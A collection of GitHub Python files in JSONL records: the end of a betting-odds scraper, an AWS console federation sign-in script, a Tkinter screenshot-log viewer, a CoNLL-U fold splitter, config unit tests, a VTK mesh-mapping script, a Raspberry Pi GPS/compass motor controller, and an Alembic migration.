handicap_two\n # win = win_one if id_one < id_two else win_two\n # # print(win)\n # if handicap != 'null':\n # handicap = '\\'' + handicap + '\\''\n # # print('核对两队名称:', option_one_name, option_one_team_id, source_a_name, option_two_name,\n # # option_two_team_id, source_b_name)\n #\n # # print('竞猜双方信息:', count, option_one_name, source_a_name, option_one_odds, option_one_team_id,\n # # option_two_name, source_b_name, option_two_odds, option_two_team_id)\n # if judge == 1:\n # sql_bet_insert = \"INSERT INTO `game_bet_info_copy` (type, source, source_matchid, match_stage,\" \\\n # \" match_id, board_num, title, bet_type, end_time, status, handicap, option_one_name, \" \\\n # \"option_two_name, option_one_odds, option_two_odds, option_one_team_id, option_two_team_id, win, source_status) \" \\\n # \"VALUES({0}, '{1}', '{2}', '{3}', {4}, {5}, '{6}', {7}, {8}, {9}, {10}, '{11}', '{12}',\" \\\n # \" {13}, {14}, {15}, {16}, {17}, {18}) \" \\\n # \"ON DUPLICATE KEY UPDATE \" \\\n # \"type={0}, source='{1}', match_id={4}, board_num={5}, title='{6}', bet_type={7}, end_time={8},\" \\\n # \" status={9}, handicap={10}, option_one_name='{11}', option_two_name='{12}', \" \\\n # \"option_one_odds={13}, option_two_odds={14}, option_one_team_id={15}, \" \\\n # \"option_two_team_id={16}, win={17}, source_status={18};\".format(types, source, id,\n # match_stage, match_id, board_num, title, bet_type, end_time, status, handicap,\n # option_one_name, option_two_name, option_one_odds, option_two_odds,\n # option_one_team_id, option_two_team_id, win, source_status)\n #\n # # print('记录竞猜表更新或插入:', sql_bet_insert)\n # db.update_insert(sql_bet_insert)\n # # print('记录竞猜表更新或插入完成')\n # else:\n # sql_searchid = \"select id from game_bet_info_copy where source_matchid={0} and\" \\\n # \" title='{1}' and match_stage='{2}';\".format(source_matchid, title, match_stage)\n # # 找到已经更新的赔率,在已结束的接口中更新win字段\n # # print('找到需要更新win字段的赔率id:', sql_searchid)\n # bet_id = db.select_id(sql_searchid)\n # if bet_id:\n # sql_bet_update_win = \"update game_bet_info_copy set win={0} where id={1};\".format(win, bet_id)\n # # print('记录竞猜表只更新win字段:', bet_id, sql_bet_update_win)\n # db.update_insert(sql_bet_update_win)\n # # print('记录竞猜表只更新win字段完成')\n\n\n\n\n\n# print('今日赔率',start_url)\nparse(start_url, headers)\n# print('今日赔率抓取完成')\n\n# print('滚盘赔率',gunpan_url1)\nfor gunpan_url in gunpan_urls:\n parse(gunpan_url, headers)\n# print('滚盘赔率抓取完成')\n\n# print('赛前赔率',befor_url)\nfor url in befor_url:\n parse(url, headers)\n# print('赛前赔率抓取完成')\n\n","repo_name":"a15807122095/scrapy_analyze","sub_path":"game/leijingji_rate.py","file_name":"leijingji_rate.py","file_ext":"py","file_size_in_byte":19536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43605635039","text":"#!/usr/bin/env python\n\nimport os\nimport json\nfrom urllib.parse import urlencode\nfrom urllib.request import urlopen\n\nCONSOLE_URL = 'https://console.aws.amazon.com/'\nSIGNIN_URL = 'https://signin.aws.amazon.com/federation?'\nLOGOUT_URL = 'https://console.aws.amazon.com/console/logout!doLogout'\nSESSION_DURATION = 43200\n\ncreds = {\n 'sessionId': os.environ['AWS_ACCESS_KEY_ID'],\n 'sessionKey': os.environ['AWS_SECRET_ACCESS_KEY'],\n 'sessionToken': os.environ['AWS_SESSION_TOKEN'],\n }\njson_creds = json.dumps(creds)\n\nparams = {\n 'Action': 'getSigninToken',\n 'SessionType': 'json',\n 'Session': json_creds,\n 'SessionDuration': SESSION_DURATION\n}\nurl = SIGNIN_URL + urlencode(params)\n# print('--------- debug: temp url --------')\n# print(url)\n\nsignin_token = json.loads(urlopen(url).read())['SigninToken']\n# print('--------- debug: signin_token --------')\n# print(signin_token)\n\nparams = {\n 'Action': 'login',\n 'SigninToken': signin_token,\n 'Destination': CONSOLE_URL,\n}\nurl = SIGNIN_URL + urlencode(params)\n# print('--------- debug: final url --------')\nprint(url)\n","repo_name":"pataraco/scripts","sub_path":"aws/aws_sso_console_login.py","file_name":"aws_sso_console_login.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17499951607","text":"import argparse\nimport collections\nimport os\nimport shutil\nimport subprocess\nimport tkinter\nfrom sys import platform as _platform\nfrom tempfile import mkdtemp\nfrom tkinter import *\n\nimport PIL\nfrom PIL import ImageTk, Image\n\nimport doms\nimport logs\nimport screenshots\nimport triggers\nimport util\n\n\nclass LogViewer(Frame):\n def __init__(self, parent, dir):\n Frame.__init__(self, parent, background=\"white\")\n\n self.base_dir = dir\n self.parent = parent\n self.init_ui()\n\n def cleanup(self):\n print('Cleaning up...')\n shutil.rmtree(self.tmp_dir)\n self.parent.destroy()\n\n def init_ui(self):\n self.parent.title(\"ChromePic Viewer\")\n self.pack(fill=BOTH, expand=True)\n self.grid_rowconfigure(0, weight=1)\n self.grid_columnconfigure(1, weight=1)\n\n self.load_data()\n self.init_menu_bar()\n self.switch_to_tab('All')\n self.init_snapshots()\n self.init_navigation()\n self.init_metadata()\n\n def get_all_tabs(self):\n all_tabs = set(util.immediate_subdirs(os.path.join(self.base_dir, 'screenshots')))\n # all_tabs |= set(util.immediate_subdirs(os.path.join(self.base_dir, 'dom_snapshots')))\n return sorted(list(all_tabs))\n\n def load_data(self):\n log_name = self.base_dir.split('/')[-1]\n self.all_tabs = self.get_all_tabs()\n\n self.metadata_all_tabs, self.tab_to_url = logs.read_screenshot_metadata(self.base_dir,\n log_name + '.txt')\n\n self.marker = Image.open('marker.png')\n\n self.tmp_dir = mkdtemp()\n\n def init_snapshots(self):\n # for displaying the snapshots\n self.display_frames = [Frame(self) for _ in range(3)]\n self.displays = [Canvas(self.display_frames[i], bd=0, highlightthickness=0) for i in range(3)]\n # text labels\n self.display_labels = [Label(self.display_frames[i], text='') for i in range(3)]\n\n self.dummy_img = PIL.Image.new('RGBA', (1, 1), \"white\")\n\n self.switch_current_image(2)\n\n self.resizing_methods = []\n self.resizing_methods.append(lambda event: self.resize(0, event.width))\n self.resizing_methods.append(lambda event: self.resize(1, event.width))\n self.resizing_methods.append(lambda event: self.resize(2, event.width))\n\n for i in range(3):\n self.displays[i].bind(\"\", self.resizing_methods[i])\n\n padx, pady = 20, 20\n # previous\n self.display_frames[0].grid(row=0, column=0, columnspan=1, rowspan=1, padx=padx, pady=pady,\n sticky=N + S + E + W)\n # current\n self.display_frames[1].grid(row=0, column=1, columnspan=1, rowspan=1, padx=padx, pady=pady,\n sticky=N + S + E + W)\n # next\n self.display_frames[2].grid(row=0, column=2, columnspan=1, rowspan=1, padx=padx, pady=pady,\n sticky=N + S + E + W)\n\n for i in range(3):\n self.display_labels[i].pack()\n self.display_labels[i].config(font=(\"Arial\", 18))\n\n for i in range(3):\n self.displays[i].pack(fill=BOTH, expand=True)\n\n def resize(self, canvas_i, width):\n try:\n img_i = canvas_i + self.current_index - 1\n if self.metadata[img_i]['tk_img'].width() != width: # it may already have been converted to correct size\n self.metadata[img_i]['tk_img'] = ImageTk.PhotoImage(\n self.resize_keep_aspect(width, self.metadata[img_i]['pil_img']))\n self.displays[canvas_i].delete(\"IMG\")\n self.displays[canvas_i].create_image(0, 0, image=self.metadata[img_i]['tk_img'], anchor=NW, tags=\"IMG\")\n except AttributeError:\n pass\n\n def resize_keep_aspect(self, new_width, img):\n wpercent = (new_width / float(img.size[0]))\n hsize = int((float(img.size[1]) * float(wpercent)))\n return img.resize((new_width, hsize), PIL.Image.ANTIALIAS)\n\n def toggle_play(self):\n if not self.play_state:\n self.play['text'] = '||'\n self.rt.start()\n self.prev['state'] = 'disabled'\n self.next['state'] = 'disabled'\n else:\n self.play['text'] = '>'\n self.rt.stop()\n self.prev['state'] = 'normal'\n self.next['state'] = 'normal'\n\n self.play_state = not self.play_state\n\n def init_navigation(self):\n self._job = None\n\n def advance():\n self.switch_current_image(self.current_index + 2)\n if self.current_index >= len(self.metadata) - 2:\n self.toggle_play()\n return False\n else:\n return True\n\n self.play_option = 'r1'\n self.rt = util.RepeatedTimer(advance, self)\n\n self.nav_frame = Frame(self)\n self.nav_frame.grid(row=7, column=0, columnspan=4, padx=10, pady=0, sticky=N + S + E + W)\n self.prev = Button(self.nav_frame, text=\"<-\", command=lambda: self.on_switch_image_delayed(self.current_index))\n # the slider is lower than the other buttons if no padding is added (for whatever reason) so add\n # top padding to the buttons to compensate for that\n button_padding_top = 13\n self.prev.pack(side=LEFT, pady=(button_padding_top, 0))\n self.play_state = False\n self.play = Button(self.nav_frame, text=\">\", command=self.toggle_play)\n self.play.pack(side=RIGHT, pady=(button_padding_top, 0))\n self.next = Button(self.nav_frame, text=\"->\",\n command=lambda: self.on_switch_image_delayed(self.current_index + 2))\n self.next.pack(side=RIGHT, pady=(button_padding_top, 0))\n self.w = Scale(self.nav_frame, from_=1, to=self.n, orient=HORIZONTAL,\n command=self.on_switch_image_delayed)\n self.w.pack(expand=True, fill=BOTH, padx=10)\n\n def on_switch_image_delayed(self, index):\n # this logic makes the image switch only if a certain amount of time has elapsed since the last scale change,\n # for performance reasons.\n # (see http://stackoverflow.com/questions/3966303/tkinter-slider-how-to-trigger-the-event-only-when-the-iteraction-is-complete)\n\n if self._job:\n self.parent.after_cancel(self._job)\n delay = 100\n self._job = self.parent.after(delay, self.switch_current_image, index)\n\n def switch_current_image(self, index):\n self._job = None\n\n index = int(index) - 1\n self.current_index = index\n\n if hasattr(self, 'prev'):\n if not self.play_state:\n self.prev['state'] = 'normal'\n self.next['state'] = 'normal'\n\n if index == 0:\n self.prev['state'] = 'disabled'\n if index == self.n - 1:\n self.next['state'] = 'disabled'\n\n if hasattr(self, 'w'):\n self.w.set(index + 1)\n\n for i in range(index - 1, index + 2):\n if not (-1 <= i <= self.n + 1):\n # out of bounds\n continue\n\n # load lazily\n if 'pil_img' not in self.metadata[i] or self.metadata[i]['pil_img'] is None:\n # img not loaded yet\n if i < 0 or i >= self.n or self.metadata[i]['fname'] not in self.all_screenshots:\n # dummy image at index=0 to prevent index out of bounds\n pil_img = self.dummy_img\n else:\n path = os.path.join(self.base_dir, 'screenshots', self.metadata[i]['fname'])\n pil_img = screenshots.read_screenshot(path)\n # only show mouse marker on events triggered by mouse\n if self.metadata[i]['trigger'] in triggers.mouse_position_triggers:\n pil_img = pil_img.copy()\n mouse_x, mouse_y = self.metadata[i]['mouse'][0], self.metadata[i]['mouse'][1]\n pil_img.paste(self.marker.copy(), (mouse_x, mouse_y))\n\n self.metadata[i]['pil_img'] = pil_img\n self.metadata[i]['tk_img'] = ImageTk.PhotoImage(pil_img)\n\n canvas_i = i - index + 1\n if self.metadata[i]['pil_img'] is not None: # if false loading the image went wrong\n self.resize(canvas_i, max(100, self.displays[canvas_i].winfo_width()))\n if 0 <= i < self.n:\n self.display_labels[canvas_i]['text'] = self.metadata[i]['fname'].split('/')[-1]\n if i == index and hasattr(self, 'event_detail'):\n if self.metadata[i]['trigger'] in triggers.keycode_triggers:\n self.event_detail['text'] = 'Last key pressed: ' + str(self.metadata[i]['key'])\n elif self.metadata[i]['trigger'] in triggers.mouse_position_triggers:\n self.event_detail['text'] = 'Last mouse pos: ({}, {})'.format(\n self.metadata[i]['mouse'][0],\n self.metadata[i]['mouse'][1])\n self.trigger_label['text'] = 'Trigger: ' + str(self.metadata[i]['trigger'])\n self.tab_label['text'] = 'Tab: ' + self.metadata[i]['tab']\n self.url_label['text'] = 'URL: ' + util.trunc(self.metadata[i]['url'], 50)\n\n if self.metadata[i]['abstime'] is None:\n self.time_label['text'] = 'Time: Error'\n else:\n date_str = self.metadata[i]['abstime'].strftime('%m/%d/%Y %H:%M:%S')\n self.time_label['text'] = 'Time: ' + date_str\n else:\n self.display_labels[canvas_i]['text'] = ''\n\n def init_metadata(self):\n metadata_frame = Frame(self)\n\n metadata_frame.grid(row=10, column=0, columnspan=4, padx=0, pady=20, sticky=N + S + E + W)\n\n self.tab_label = Label(metadata_frame, text='')\n self.tab_label.pack()\n\n self.url_label = Label(metadata_frame, text='')\n self.url_label.pack()\n\n self.trigger_label = Label(metadata_frame, text='')\n self.trigger_label.pack()\n\n self.event_detail = Label(metadata_frame, text='')\n self.event_detail.pack()\n\n self.time_label = Label(metadata_frame, text='')\n self.time_label.pack()\n\n self.dom_button = Button(metadata_frame, text='Show DOM text', command=self.show_dom)\n self.dom_button.pack()\n\n self.dom_explorer_button = Button(metadata_frame, text='Show DOM in explorer ', command=self.show_dom_explorer)\n self.dom_explorer_button.pack()\n\n def show_dom(self):\n path = os.path.join(self.base_dir, 'dom_snapshots', self.metadata[self.current_index]['dom'])\n dom = doms.read_dom(path)\n # write to temporary file\n fname = '(text only) ' + self.metadata[self.current_index]['tab'] + ': ' \\\n + self.metadata[self.current_index]['dom'].split('/')[-1][:-5] + 'txt'\n temp_path = doms.write_to_temp(dom, fname, self.tmp_dir)\n\n if _platform == 'linux' or _platform == 'linux2':\n # linux\n subprocess.call(['xdg-open', temp_path])\n elif _platform == 'darwin':\n # MAC OS X\n subprocess.call(['open', temp_path])\n elif _platform == 'win32':\n # Windows\n subprocess.call([temp_path])\n\n def show_dom_explorer(self):\n file_path = os.path.join(self.base_dir, 'dom_snapshots', self.metadata[self.current_index]['dom'])\n folder_path = os.path.dirname(file_path)\n\n if _platform == 'linux' or _platform == 'linux2':\n # linux: select file in file browser\n subprocess.call(['nautilus', file_path])\n elif _platform == 'darwin':\n # MAC OS X\n subprocess.call(['open', '--', folder_path])\n elif _platform == 'win32':\n # Windows\n os.startfile(folder_path)\n\n def init_menu_bar(self):\n self.menubar = Menu(self)\n\n # Tab menu\n self.tab_menu = Menu(self.menubar, tearoff=0)\n self.menubar.add_cascade(label=\"Tab\", menu=self.tab_menu)\n self.vlevel = IntVar()\n\n # all tabs\n self.tab_menu.add_radiobutton(label='All', var=self.vlevel, value=0,\n command=lambda: self.switch_to_tab('All'))\n\n tab_time = {}\n for m in self.metadata_all_tabs:\n if m['tab'] not in tab_time:\n tab_time[m['tab']] = m['t']\n\n for i, tab in enumerate(self.all_tabs):\n t = tab_time[tab] if tab in tab_time else -1\n label = self.tab_to_url[tab] if tab in self.tab_to_url else 'New tab'\n label = '{} (time: {:.1f} s)'.format(util.extract_domain(label), t)\n self.tab_menu.add_radiobutton(label=label, var=self.vlevel, value=i + 1,\n command=lambda: self.switch_to_tab(self.all_tabs[self.vlevel.get() - 1]))\n\n # Play menu\n self.play_menu = Menu(self.menubar, tearoff=0)\n self.menubar.add_cascade(label=\"Play speed\", menu=self.play_menu)\n self.vplay = IntVar()\n\n self.play_menu.add_radiobutton(label='Real time', var=self.vplay, value=0,\n command=lambda: self.set_play_option('r1'))\n self.play_menu.add_radiobutton(label='Real time x 0.5', var=self.vplay, value=1,\n command=lambda: self.set_play_option('r0.5'))\n self.play_menu.add_radiobutton(label='Real time x 2', var=self.vplay, value=2,\n command=lambda: self.set_play_option('r2'))\n self.play_menu.add_radiobutton(label='Real time x 4', var=self.vplay, value=3,\n command=lambda: self.set_play_option('r4'))\n\n self.play_menu.add_radiobutton(label='Constant time 0.5s', var=self.vplay, value=5,\n command=lambda: self.set_play_option('c0.5'))\n self.play_menu.add_radiobutton(label='Constant time 1s', var=self.vplay, value=6,\n command=lambda: self.set_play_option('c1'))\n self.play_menu.add_radiobutton(label='Constant time 2s', var=self.vplay, value=7,\n command=lambda: self.set_play_option('c2'))\n self.play_menu.add_radiobutton(label='Constant time 4s', var=self.vplay, value=8,\n command=lambda: self.set_play_option('c4'))\n\n try:\n self.master.config(menu=self.menubar)\n except AttributeError:\n # master is a toplevel window (Python 1.4/Tkinter 1.63)\n self.master.tk.call(self.parent, \"config\", \"-menu\", self.menubar)\n\n def set_play_option(self, option):\n self.play_option = option\n self.rt.set_play_option(self.play_option)\n\n def switch_to_tab(self, tab_name):\n print('Switching to tab ' + tab_name)\n self.tab = tab_name\n if self.tab == 'All':\n self.all_screenshots = []\n for t in self.all_tabs:\n additional_screenshots = screenshots.get_all_screenshot_names(\n os.path.join(self.base_dir, 'screenshots', t))\n for i in range(len(additional_screenshots)):\n additional_screenshots[i] = os.path.join(t, additional_screenshots[i])\n self.all_screenshots += additional_screenshots\n\n else:\n self.all_screenshots = screenshots.get_all_screenshot_names(\n os.path.join(self.base_dir, 'screenshots', self.tab))\n for i in range(len(self.all_screenshots)):\n self.all_screenshots[i] = os.path.join(self.tab, self.all_screenshots[i])\n\n # assuming they're named \"tab/snapshot_x.png\"\n self.all_screenshots = sorted(self.all_screenshots, key=lambda x: int(x[x.rfind('_') + 1:-4]))\n\n if hasattr(self, 'metadata'):\n if 't' in self.metadata[self.current_index]:\n old_time = self.metadata[self.current_index]['t']\n else:\n old_time = 0\n else:\n old_time = 0\n\n # metadata just for this tab\n self.metadata = collections.defaultdict(dict)\n for m in self.metadata_all_tabs:\n if self.tab == 'All' or m['tab'] == self.tab:\n m['tk_img'] = None\n m['pil_img'] = None\n self.metadata[len(self.metadata)] = m\n # len of metadata might change because of dummy images\n self.n = len(self.metadata)\n\n if hasattr(self, 'w'):\n self.w.config(to=self.n)\n index = 0 # logs.time_closest(self.metadata, old_time) <-- Uncomment to jump to nearest time. Still has bug though.\n self.switch_current_image(index + 1)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('dir', metavar='directory', type=str,\n help='Directory in which the log text file is contained, '\n 'along with the screenshots and dom_snapshots directories.')\n args = parser.parse_args()\n dir = args.dir\n print('Dir: ' + dir)\n\n root = tkinter.Tk()\n root.tk_setPalette(background='white')\n app = LogViewer(root, dir)\n wh_ratio = 1.9\n width = 1200\n height = int(width / wh_ratio)\n root.geometry(\"{}x{}+100+100\".format(width, height))\n root.protocol(\"WM_DELETE_WINDOW\", app.cleanup)\n root.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chromepic/chromepic-viz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27553495819","text":"from pathlib import Path\nimport os\nimport random\n\nfrom conllu import parse\n\nn_folds = 5\nrandom.seed(9870534)\n\nsrc_dir = Path('data/sources/ud-frisian')\ntgt_dir = Path('data/conllu-folds/frisian')\nos.makedirs(tgt_dir, exist_ok=True)\n\ntokenlists = []\nfor filename in [\n 'fy_testap.conllu', 'nieuws-combined.conllu', 'tresoar.conllu'\n]:\n with open(src_dir / filename) as f:\n tokenlists_ = parse(f.read())\n print(filename, len(tokenlists_), tokenlists_[0], tokenlists_[0][0])\n tokenlists.extend(tokenlists_)\n\nprint('')\nprint(len(tokenlists), len(tokenlists) // n_folds, len(tokenlists) % n_folds)\nrandom.shuffle(tokenlists)\n\nfold_size = len(tokenlists) // n_folds\n\nfor i in range(1, n_folds + 1):\n if i == n_folds:\n fold = tokenlists[(i - 1) * fold_size:]\n else:\n fold = tokenlists[(i - 1) * fold_size:i * fold_size]\n\n print(i, len(fold))\n\n with open(tgt_dir / f'fold-{i}.conllu', 'w') as f:\n f.writelines([s.serialize() for s in fold])\n","repo_name":"wietsedv/low-resource-adapt","sub_path":"src/prepare/split_conllu_fy.py","file_name":"split_conllu_fy.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"15579864665","text":"import unittest\nfrom unittest.mock import patch, mock_open, Mock\nfrom src import Config as cfg\nfrom src.Config import Config\n\n\n\nclass TestConfig(unittest.TestCase):\n \n _CONFIG_ARGS = {\n \"base_output_dir\" : \"output_test\",\n \"model_output_dir\": \"output_test/model\",\n \"base_data_dir\": \"data_test\",\n \"dataset_name\": \"test_datasets_name\",\n \"optimizer_name\": \"OPT\",\n \"learning_rate\": 1e-5,\n \"epochs\": 30,\n \"drop_out\":0.3,\n \"batch_size\": 64,\n \"es_epochs\": 100,\n \"patience\":5,\n \"plot_every\":32,\n \"ratio_split\": \"60/40\",\n \"weight_decay\": 1e-4,\n \"load_best\": True,\n \"num_of_class\":3\n }\n \n _GEN_CONFIG_ARGS = {\n 'lrs': [1e-3, 1e-4, 1e-5],\n 'eps': [30, 50],\n 'opts': ['Adam', 'NAdam'],\n 'is_include_es': True,\n 'target': './target',\n 'ratios': ['60/40', '70/30', '80/20']\n }\n \n def count_json_dumps_called(self):\n # try to count how many json.dumps is called \n # based on the foor loop structure\n res = 1\n d = self._GEN_CONFIG_ARGS\n res *= len(d['ratios'])\n res *= len(d['opts'])\n res *= len(d['eps'])\n is_include_es = d['is_include_es']\n if is_include_es:\n res = (res) + ( res / len(d['eps']))\n res *= len(d['lrs'])\n return res\n \n \n def test_new_Config(self):\n \n got = Config(**self._CONFIG_ARGS)\n \n self.assertIsInstance(got, Config)\n \n def test_get_dict(self):\n \n cnf = Config(**self._CONFIG_ARGS)\n got = cnf.get_dict()\n \n # assert is not empty dict\n self.assertIsInstance(got, dict)\n self.assertTrue(bool(got))\n \n # test function module \n # create mock with patch decoretator\n @patch('builtins.open', mock_open(read_data='test'))\n @patch('pathlib.Path')\n @patch('utils.convert_str_to_path')\n @patch('json.load')\n def test_load_config(self, mock_json_load, mock_convert_str_to_path, mock_path):\n \n mock_convert_str_to_path.return_value = mock_path\n mock_path.is_file = True\n mock_json_load.return_value = self._CONFIG_ARGS\n \n got = cfg.load_config('./test.json')\n \n self.assertIsNotNone(got)\n self.assertIsInstance(got, Config)\n \n \n @patch('builtins.open', mock_open(read_data='test'))\n @patch('src.Config.Config') \n @patch('src.Config.load_config')\n @patch('builtins.print')\n @patch('json.dumps')\n def test_generate_all_possible_config(self, mock_json_dumps,_, mock_load_config, mock_config):\n \n mock_load_config.return_value = mock_config\n mock_config.get_dict.return_value = self._CONFIG_ARGS\n call_count = self.count_json_dumps_called()\n \n cfg.generate_all_possible_config(**self._GEN_CONFIG_ARGS)\n \n self.assertEqual(mock_json_dumps.call_count, call_count)\n \n ","repo_name":"mfajri11/EfficientNet-AksaraSunda","sub_path":"test/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11162898203","text":"# --- VTK-PYTHON SCRIPT FOR READING MESH VTP AND DACH1 VTI TO MAP DACH1 VALUES ONTO MESH SURFACE\r\n# --- WRITTEN BY SUHAAS ANBAZHAKAN\r\n# --- BASED ON A SCRIPT BY AEKAANSH VERMA\r\n\r\nimport sys\r\nimport vtk\r\nimport numpy as np\r\nfrom vtk.util import numpy_support as VN\r\n\r\nvtk_file_prefix = 'all_results'\r\nWSS_CONV_FACTOR = 10000\r\nP_CONV_FACTOR = .133333333333333\r\nINTERPOLATING_RADIUS = 5\r\n# First, read in the .vtp file for mesh and Dach1\r\ndatareader=vtk.vtkXMLPolyDataReader()\r\ndatareader.SetFileName(vtk_file_prefix + '.vtp')\r\ndatareader.Update()\r\n\r\nref = vtk.vtkXMLImageDataReader()\r\nref.SetFileName('Dach1.vti')\r\nref.Update()\r\n\r\n# Read your data into another polydata variable for reading\r\nmesh=vtk.vtkPolyData()\r\nmesh=datareader.GetOutput()\r\n\r\ndach=vtk.vtkPolyData()\r\ndach=ref.GetOutput()\r\n\r\nnumPts=mesh.GetNumberOfPoints()\r\n\r\n# Create new Dach1 Array to fill\r\ndach1Array = vtk.vtkDoubleArray()\r\n\r\n# Loop through mesh points, find closest point in Dach1.vti, and add to Dach1 Array\r\nfor meshPointID in xrange(0, numPts):\r\n\tmeshPointCoordinate = mesh.GetPoint(meshPointID)\r\n\tdachPointID = dach.FindPoint(meshPointCoordinate)\r\n\tdach1Value = dach.GetPointData().GetArray('ImageFile').GetValue(dachPointID)\r\n\tdach1Array.InsertNextValue(dach1Value)\r\n\r\n# Add Dach1 Array to point data\r\ndach1Array.SetName('Dach1') \r\nmesh.GetPointData().AddArray(dach1Array)\r\n\r\n# Convert TA_WSS and Pressure to micron units and new arrays to point data\r\nTA_WSS = VN.vtk_to_numpy(model.GetPointData().GetArray('vTAWSS'))\r\nTA_WSS_numpy = WSS_CONV_FACTOR*TA_WSS\r\nTA_WSS_vtk = VN.numpy_to_vtk(TA_WSS_numpy)\r\nTA_WSS_vtk.SetName('vTAWSS (dynes/cm^2)') \r\nmesh.GetPointData().AddArray(TA_WSS_vtk) \r\n\r\npressure_avg = VN.vtk_to_numpy(model.GetPointData().GetArray('pressure_avg'))\r\npressure_numpy = pressure_avg/P_CONV_FACTOR\r\npressure_vtk = VN.numpy_to_vtk(pressure_numpy)\r\npressure_vtk.SetName('pressure_avg (mmHg)') \r\nmesh.GetPointData().AddArray(pressure_vtk) \r\n\r\n\r\n# Write a new .vtp file that has all converted values and mapped values.\r\nw = vtk.vtkXMLPolyDataWriter()\r\nw.SetInputData(model)\r\nw.SetFileName('all_results_mapped.vtp')\r\nw.Write()\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"suhaasa/Suhaas-useful-scripts","sub_path":"vtk_mapping.py","file_name":"vtk_mapping.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9627989491","text":"import RPi.GPIO as gpio\nimport smbus\nimport time\nimport math\nimport os\nimport serial\nfrom math import degrees, atan2\ngpio.setmode(gpio.BOARD)\ngpio.setup(7,gpio.OUT)\ngpio.setup(11,gpio.OUT)\ngpio.setup(13,gpio.OUT)\ngpio.setup(15,gpio.OUT)\ngpio.setup(16,gpio.OUT)\ngpio.setup(18,gpio.OUT)\n########### function to calculate the present bearing position of the vehicle.\ndef get_bearing():\n bus=smbus.SMBus(1)\n address=0x1e\n def read_byte(adr):\n return bus.read_byte_data(address, adr)\n def read_word(adr):\n high = bus.read_byte_data(address, adr)\n low = bus.read_byte_data(address, adr+1)\n val = (high<< 8) +low\n return val\n def read_word_2c(adr):\n val = read_word(adr)\n if (val>=0x8000):\n return -((65535-val)+1)\n else:\n return val\n def write_byte(adr,value):\n bus.write_byte_data(address, adr, value)\n write_byte(0, 0b01110000)\n write_byte(1, 0b00100000)\n write_byte(2, 0b00000000)\n scale = 0.92\n x_offset = -10\n y_offset = 10\n x_out = (read_word_2c(3)- x_offset+2) * scale\n y_out = (read_word_2c(7)- y_offset+2)* scale\n z_out = read_word_2c(5) * scale\n bearing = math.atan2(y_out, x_out)+.45\n if (bearing<0):\n bearing +=2*math.pi\n return math.degrees(bearing)\n else:\n return math.degrees(bearing)\n\n##########function to calculate present GPS coordinates.\ndef get_present_gps(): \n ser=serial.Serial('/dev/ttyAMA0',9600)\n ser.open()\n # open a file to write gps data\n f = open('/home/pi/Desktop/gps1', 'w')\n data=ser.read(128) # read 1024 bytes\n f.write(data) #write data into file\n f.flush() #flush from buffer into os buffer\n #ensure to write from os buffers(internal) into disk\n f = open('/home/pi/Desktop/gps1', 'r')# fetch the required file\n for line in f.read().split('\\n'):\n if line.startswith('$GPGGA'):\n lat, _, lon= line.split(',')[2:5]\n try:\n lat=float(lat)\n lon=float(lon)\n a=[lat,lon]\n return a\n except:\n pass\n####### #function to calculate present GPS coordinates ends here.\nx=float(raw_input('x:'))\ny=float(raw_input('y:'))\nb=get_present_gps()\ncentre_x=b[0]/100\ncentre_y=b[1]/100\n#########function to calculate bearing that is between destination and home\ndef gb(x,y,centre_x, centre_y): \n angle=degrees(atan2(y-centre_y,x-centre_x))\n bearing1=(angle+360)%360\n return bearing1\n######## function that will set the vehicle in the direction(bearing) of destination.\ndef rotate():\n d=gb(x,y,centre_x, centre_y)\n a=get_bearing()\n if (a-d>=0 and a-d<=1):\n gpio.output(7,False)\n gpio.output(11,False)\n gpio.cleanup()\n elif(d-a<=0 and d-a>=-1):\n gpio.output(7,False)\n gpio.output(11,False)\n gpio.cleanup()\n else:\n gpio.setup(18,False)\n gpio.setup(16,False)\n time.sleep(.2)\n gpio.output(7,False)\n gpio.output(11,True)\n p=gpio.PWM(11,80)\n p.start(1)\n time.sleep(.2)\n gpio.setup(13,False)\n gpio.setup(15,False)\n gpio.setup(16,True)\n gpio.setup(18,False)\n p.ChangeDutyCycle(50)\n rotate()\nrotate()\n \n \n","repo_name":"ruthvik92/HMC5883L-GPS--DCMotor-PythonCodesForRaspberryPi","sub_path":"aimingingpsbearing.py","file_name":"aimingingpsbearing.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"28753028609","text":"\"\"\"Initial migration.\n\nRevision ID: 6717af29eb23\nRevises: 2728e1a824e4\nCreate Date: 2023-11-15 12:23:34.461198\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '6717af29eb23'\ndown_revision = '2728e1a824e4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('booking',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('equipment_id', sa.Integer(), nullable=True),\n sa.Column('date', sa.Date(), nullable=True),\n sa.Column('start_time', sa.Time(), nullable=True),\n sa.Column('end_time', sa.Time(), nullable=True),\n sa.ForeignKeyConstraint(['equipment_id'], ['equipment.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('booking')\n # ### end Alembic commands 